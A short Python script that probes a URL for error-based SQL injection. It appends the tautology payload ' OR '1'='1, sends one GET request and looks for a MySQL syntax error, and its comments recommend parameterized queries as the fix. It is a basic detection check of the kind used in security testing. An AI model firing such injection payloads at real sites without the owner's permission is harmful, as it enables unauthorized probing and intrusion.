import requests
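def check_sqli(url):
    """Probe *url* for an error-based SQL injection indicator.

    Appends a single-quote tautology payload to ``url``, issues one GET
    request, and looks for the SQL syntax error text (the wording MySQL and
    MariaDB use) in the response body.

    Args:
        url: Target URL, expected to end in the parameter value under test
            (the payload is concatenated directly onto it).

    Returns:
        True if the response body contains the SQL syntax error marker,
        False otherwise. False is also returned when the request itself
        fails, so it means "no indicator seen", not "not vulnerable":
        applications that suppress database errors, or that run on a
        different database engine, will not match this marker.
    """
    test_payload = "' OR '1'='1"
    try:
        # Bounded wait: without a timeout, requests can block indefinitely
        # on an unresponsive host.
        r = requests.get(url + test_payload, timeout=10)
    except requests.RequestException:
        # Only transport/HTTP-layer failures are treated as "inconclusive".
        # A bare ``except`` would also swallow KeyboardInterrupt and hide
        # programming errors such as passing a non-string URL.
        return False
    # A raw database error echoed back to the client is the finding here;
    # the fix on the server side is parameterized queries plus generic
    # error pages.
    return "error in your SQL syntax" in r.text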
# Usage example: run the check against a sample URL and report a positive
# indicator. The printed message reads "possible SQL injection vulnerability".
target = "http://test.com/page?id=1"
flagged = check_sqli(target)
if flagged:
    print("可能存在SQL注入漏洞")